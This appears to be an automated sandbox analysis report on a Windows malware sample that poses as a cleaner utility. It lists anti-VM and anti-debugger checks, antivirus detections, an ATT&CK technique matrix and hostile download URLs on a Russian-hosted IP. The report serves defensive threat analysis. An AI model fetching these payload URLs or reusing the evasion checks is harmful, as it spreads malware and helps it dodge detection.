Source: C:\Users\user\Desktop\zSmMqGGeVy.exe TID: 7416 Thread sleep count: 59 > 30
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe TID: 7416 Thread sleep time: -118059s >= -30000s
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe TID: 7388 Thread sleep count: 1259 > 30
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe TID: 7388 Thread sleep time: -2519259s >= -30000s
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe TID: 7336 Thread sleep count: 60 > 30
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe TID: 7336 Thread sleep count: 86 > 30
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe TID: 7336 Thread sleep count: 74 > 30
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe TID: 7336 Thread sleep count: 91 > 30
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe TID: 7336 Thread sleep count: 86 > 30
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe TID: 7336 Thread sleep count: 186 > 30
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe TID: 7336 Thread sleep count: 184 > 30
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe TID: 7336 Thread sleep count: 171 > 30
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe TID: 7336 Thread sleep count: 121 > 30
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe TID: 7496 Thread sleep time: -32000s >= -30000s
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe TID: 7404 Thread sleep count: 1741 > 30
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe TID: 7404 Thread sleep time: -3483741s >= -30000s
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe TID: 7408 Thread sleep count: 1711 > 30
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe TID: 7408 Thread sleep time: -3423711s >= -30000s
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe TID: 7396 Thread sleep count: 1753 > 30
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe TID: 7396 Thread sleep time: -3507753s >= -30000s
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe TID: 7392 Thread sleep count: 292 > 30
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe TID: 7392 Thread sleep time: -584292s >= -30000s
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00415D07 FindFirstFileExW,0_2_00415D07
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_10007EA9 FindFirstFileExW,0_2_10007EA9
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00EA5F6E FindFirstFileExW,0_2_00EA5F6E
Source: zSmMqGGeVy.exe, zSmMqGGeVy.exe, 00000000.00000002.2597807409.000000000099B000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Amcache.hve.9.drBinary or memory string: VMware
Source: Amcache.hve.9.drBinary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.9.drBinary or memory string: vmci.syshbin
Source: Amcache.hve.9.drBinary or memory string: VMware, Inc.
Source: Amcache.hve.9.drBinary or memory string: VMware20,1hbin@
Source: Amcache.hve.9.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.9.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.9.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: zSmMqGGeVy.exe, 00000000.00000002.2600833623.0000000005665000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000002.2598480313.0000000000E65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: Amcache.hve.9.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: zSmMqGGeVy.exe, 00000000.00000003.2261056249.00000000056B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\4
Source: Amcache.hve.9.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.9.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.9.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.9.drBinary or memory string: vmci.sys
Source: Amcache.hve.9.drBinary or memory string: vmci.syshbin`
Source: Amcache.hve.9.drBinary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.9.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.9.drBinary or memory string: VMware20,1
Source: Amcache.hve.9.drBinary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.9.drBinary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.9.drBinary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.9.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.9.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.9.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.9.drBinary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.9.drBinary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.9.drBinary or memory string: VMware Virtual RAM
Source: Amcache.hve.9.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: zSmMqGGeVy.exe, 00000000.00000002.2597807409.000000000099B000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: Amcache.hve.9.drBinary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: Amcache.hve.9.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeSystem information queried: ModuleInformationJump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

Source: C:\Users\user\Desktop\zSmMqGGeVy.exeThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeOpen window title or class name: regmonclass
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeOpen window title or class name: gbdyllo
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeOpen window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeOpen window title or class name: ollydbg
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeOpen window title or class name: filemonclass
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeFile opened: NTICE
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeFile opened: SICE
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeFile opened: SIWVID
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00A930C8 rdtsc 0_2_00A930C8
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_0040C0B3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040C0B3
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00402950 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,0_2_00402950
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_0041366F mov eax, dword ptr fs:[00000030h]0_2_0041366F
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_0040EF0D mov eax, dword ptr fs:[00000030h]0_2_0040EF0D
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_10007A76 mov eax, dword ptr fs:[00000030h]0_2_10007A76
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_10005F25 mov eax, dword ptr fs:[00000030h]0_2_10005F25
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00DA9D3B push dword ptr fs:[00000030h]0_2_00DA9D3B
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00EA38D6 mov eax, dword ptr fs:[00000030h]0_2_00EA38D6
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00E9F174 mov eax, dword ptr fs:[00000030h]0_2_00E9F174
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00E9092B mov eax, dword ptr fs:[00000030h]0_2_00E9092B
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00E90D90 mov eax, dword ptr fs:[00000030h]0_2_00E90D90
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00402C70 SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,0_2_00402C70
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_0040C0B3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040C0B3
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00409949 SetUnhandledExceptionFilter,0_2_00409949
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00408ED5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00408ED5
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_004097B2 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004097B2
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_10002ADF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_10002ADF
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_100056A0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_100056A0
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_10002FDA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_10002FDA
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00E9913C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00E9913C
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00E99A19 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00E99A19
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00E99BB0 SetUnhandledExceptionFilter,0_2_00E99BB0
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00E9C31A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00E9C31A
Source: zSmMqGGeVy.exe, zSmMqGGeVy.exe, 00000000.00000002.2597807409.000000000099B000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_004099B3 cpuid 0_2_004099B3
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00409BE5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00409BE5
Source: Amcache.hve.9.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.9.drBinary or memory string: msmpeng.exe
Source: Amcache.hve.9.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.9.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.9.drBinary or memory string: MsMpEng.exe
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts3
Command and Scripting Interpreter
1
DLL Side-Loading
2
Process Injection
11
Masquerading
OS Credential Dumping1
System Time Discovery
Remote Services1
Archive Collected Data
2
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading
24
Virtualization/Sandbox Evasion
LSASS Memory781
Security Software Discovery
Remote Desktop ProtocolData from Removable Media12
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
Process Injection
Security Account Manager24
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Deobfuscate/Decode Files or Information
NTDS3
Process Discovery
Distributed Component Object ModelInput Capture12
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
Obfuscated Files or Information
LSA Secrets1
Application Window Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts13
Software Packing
Cached Domain Credentials2
File and Directory Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Timestomp
DCSync223
System Information Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
DLL Side-Loading
Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

Source | Detection | Scanner | Label | Link
zSmMqGGeVy.exe | 37% | ReversingLabs | Win32.Malware.BluWin
zSmMqGGeVy.exe | 100% | Avira | HEUR/AGEN.1320706
zSmMqGGeVy.exe | 100% | Joe Sandbox ML
Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1] | 100% | Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\VwweWtdD5CJ\Y-Cleaner.exe | 100% | Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\dll[1] | 0% | ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1] | 75% | ReversingLabs | ByteCode-MSIL.Trojan.Malgent
C:\Users\user\AppData\Local\Temp\VwweWtdD5CJ\Bunifu_UI_v1.5.3.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\VwweWtdD5CJ\Y-Cleaner.exe | 75% | ReversingLabs | ByteCode-MSIL.Trojan.Malgent
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
s-part-0035.t-0009.t-msedge.net
13.107.246.63
truefalse
    high
    time.windows.com
    unknown
    unknownfalse
      high
      NameMaliciousAntivirus DetectionReputation
      http://185.156.73.23/files/downloadfalse
        unknown
        http://185.156.73.23/dll/keyfalse
          unknown
          http://185.156.73.23/soft/downloadfalse
            unknown
            http://185.156.73.23/add?substr=mixtwo&s=three&sub=empfalse
              unknown
              http://185.156.73.23/dll/downloadfalse
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                http://upx.sf.netAmcache.hve.9.drfalse
                  high
                  http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174zSmMqGGeVy.exe, 00000000.00000003.2240803688.00000000058D2000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2242386350.00000000058E8000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2239260994.000000000588F000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2241126428.000000000588F000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2239581973.00000000058F0000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2239380506.00000000056B4000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2239325591.0000000005710000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2240552425.000000000588F000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2241006359.0000000005A51000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.drfalse
                    high
                    http://185.156.73.23/files/download5zSmMqGGeVy.exe, 00000000.00000002.2600833623.0000000005650000.00000004.00000020.00020000.00000000.sdmpfalse
                      unknown
                      https://iplogger.org/1Pz8p7zSmMqGGeVy.exe, 00000000.00000003.2240803688.00000000058D2000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2242386350.00000000058E8000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2239260994.000000000588F000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2241126428.000000000588F000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2239581973.00000000058F0000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2239380506.00000000056B4000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2239325591.0000000005710000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2240552425.000000000588F000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2241006359.0000000005A51000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.drfalse
                        high
                        https://g-cleanit.hkzSmMqGGeVy.exe, 00000000.00000003.2240803688.00000000058D2000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2242386350.00000000058E8000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2239260994.000000000588F000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2241126428.000000000588F000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2239581973.00000000058F0000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2239380506.00000000056B4000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2239325591.0000000005710000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2240552425.000000000588F000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2241006359.0000000005A51000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.drfalse
                          high
                          http://185.156.73.23/dll/downloadWzSmMqGGeVy.exe, 00000000.00000002.2600833623.0000000005650000.00000004.00000020.00020000.00000000.sdmpfalse
                            unknown
                            IP | Domain | Country | ASN | ASN Name | Malicious
                            185.156.73.23 | unknown | Russian Federation | 48817 | RELDAS-NETRU | false
                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1578937
                            Start date and time:2024-12-20 16:52:38 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 7m 9s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:12
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:zSmMqGGeVy.exe
                            renamed because original name is a hash value
                            Original Sample Name:83aa26bd8755e994141c4b6d525307ba.exe
                            Detection:MAL
                            Classification:mal100.evad.winEXE@2/15@1/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:Failed
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                            • Excluded IPs from analysis (whitelisted): 40.81.94.65, 20.42.65.92, 13.107.246.63, 20.12.23.50, 40.126.53.18
                            • Excluded domains from analysis (whitelisted): www.bing.com, onedsblobprdeus17.eastus.cloudapp.azure.com, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, twc.trafficmanager.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                            • VT rate limit hit for: zSmMqGGeVy.exe
                            TimeTypeDescription
                            10:54:14API Interceptor1456416x Sleep call for process: zSmMqGGeVy.exe modified
                            10:55:46API Interceptor1x Sleep call for process: WerFault.exe modified
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            185.156.73.23tXEKP1ThBP.exeGet hashmaliciousUnknownBrowse
                            • 185.156.73.23/soft/download
                            hvm4oOzDaX.exeGet hashmaliciousUnknownBrowse
                            • 185.156.73.23/soft/download
                            4kahanaK78.exeGet hashmaliciousUnknownBrowse
                            • 185.156.73.23/soft/download
                            7JKssbjRDa.exeGet hashmaliciousUnknownBrowse
                            • 185.156.73.23/soft/download
                            dI3n4LSHB7.exeGet hashmaliciousUnknownBrowse
                            • 185.156.73.23/soft/download
                            zmTSHkabY6.exeGet hashmaliciousUnknownBrowse
                            • 185.156.73.23/soft/download
                            8V0INSl0E2.exeGet hashmaliciousUnknownBrowse
                            • 185.156.73.23/soft/download
                            BEd2lJRXFM.exeGet hashmaliciousUnknownBrowse
                            • 185.156.73.23/soft/download
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            s-part-0035.t-0009.t-msedge.net2M43DSi2cx.exeGet hashmaliciousUnknownBrowse
                            • 13.107.246.63
                            VajVW1leCd.exeGet hashmaliciousUnknownBrowse
                            • 13.107.246.63
                            7JKssbjRDa.exeGet hashmaliciousUnknownBrowse
                            • 13.107.246.63
                            m21jm5y5Z5.exeGet hashmaliciousLummaCBrowse
                            • 13.107.246.63
                            16ebsersuX.exeGet hashmaliciousCryptbotBrowse
                            • 13.107.246.63
                            Qmg24kMXxU.exeGet hashmaliciousLummaC, StealcBrowse
                            • 13.107.246.63
                            f48jWpQ2F8.exeGet hashmaliciousLummaCBrowse
                            • 13.107.246.63
                            MS100384UTC.xlsGet hashmaliciousUnknownBrowse
                            • 13.107.246.63
                            RZnZbS97dD.exeGet hashmaliciousLummaCBrowse
                            • 13.107.246.63
                            Invoice Shipment.bat.exeGet hashmaliciousDarkCloudBrowse
                            • 13.107.246.63
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            RELDAS-NETRUtXEKP1ThBP.exeGet hashmaliciousUnknownBrowse
                            • 185.156.73.23
                            hvm4oOzDaX.exeGet hashmaliciousUnknownBrowse
                            • 185.156.73.23
                            4kahanaK78.exeGet hashmaliciousUnknownBrowse
                            • 185.156.73.23
                            7JKssbjRDa.exeGet hashmaliciousUnknownBrowse
                            • 185.156.73.23
                            dI3n4LSHB7.exeGet hashmaliciousUnknownBrowse
                            • 185.156.73.23
                            zmTSHkabY6.exeGet hashmaliciousUnknownBrowse
                            • 185.156.73.23
                            8V0INSl0E2.exeGet hashmaliciousUnknownBrowse
                            • 185.156.73.23
                            BEd2lJRXFM.exeGet hashmaliciousUnknownBrowse
                            • 185.156.73.23
                            beacon.exeGet hashmaliciousCobaltStrikeBrowse
                            • 185.156.73.37
                            No context
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\dll[1]tXEKP1ThBP.exeGet hashmaliciousUnknownBrowse
                              hvm4oOzDaX.exeGet hashmaliciousUnknownBrowse
                                7JKssbjRDa.exeGet hashmaliciousUnknownBrowse
                                  dI3n4LSHB7.exeGet hashmaliciousUnknownBrowse
                                    8V0INSl0E2.exeGet hashmaliciousUnknownBrowse
                                      BEd2lJRXFM.exeGet hashmaliciousUnknownBrowse
                                        file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                          file.exeGet hashmaliciousUnknownBrowse
                                            file.exeGet hashmaliciousUnknownBrowse
                                              file.exeGet hashmaliciousUnknownBrowse
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.9865335553061164
                                                Encrypted:false
                                                SSDEEP:96:f2ZxWG9oMKbsvhN97YjSYQXIDcQoc6ScE5cw3yTJ+HbHg/8BRTf3Oy1oVazW0H9a:f4xVoMKbo0WWDLjudvszuiFAZ24IO8P
                                                MD5:F2EFC88C2F920CC8AE95262B5D1E5671
                                                SHA1:16E135D0A8D661CE9C276E6220391DBD695DCF71
                                                SHA-256:4F2E371968CEB477A9207AF2EADFAC45C9A61BCFE986E4DE3AF4FEF6E8E72A58
                                                SHA-512:23E1B2612BC1E4C6F202E7547181E6BD6A26B856271AF12C2757A59FE1D9A37DF4B921ABAEBBB8B05648D501F8341D187C2ECDB9420C098781079AB89786D3AE
                                                Malicious:true
                                                Reputation:low
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Mini DuMP crash report, 14 streams, Fri Dec 20 15:55:16 2024, 0x1205a4 type
                                                Category:dropped
                                                Size (bytes):46496
                                                Entropy (8bit):2.5442778663649674
                                                Encrypted:false
                                                SSDEEP:192:f/G8M03XfmDHYXNyOioGpvTEAWdCFMzs/xG7syGtXK7YwSsGh2nUUs3d1gpFsqvk:T/mDHANPG5gAWdCrJjtDsJPkYdU
                                                MD5:5924CD1A6FED2B88BA8B061193711076
                                                SHA1:98C39D3E5A4542ACE63A3DC051945627CCE42CFF
                                                SHA-256:2E4BB1AB576EDC60D51D4F3DEBAD2A26C0A298CD81251343DFD6E802F91E642A
                                                SHA-512:D4D2D3622C77239A217DBA7B96F3A068A514C2EC651F142F38634535021850604E7C346781638716FDACB8E8D6168948D6433A0A5133F467B2AE01727A237B20
                                                Malicious:false
                                                Reputation:low
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):8394
                                                Entropy (8bit):3.698559615617433
                                                Encrypted:false
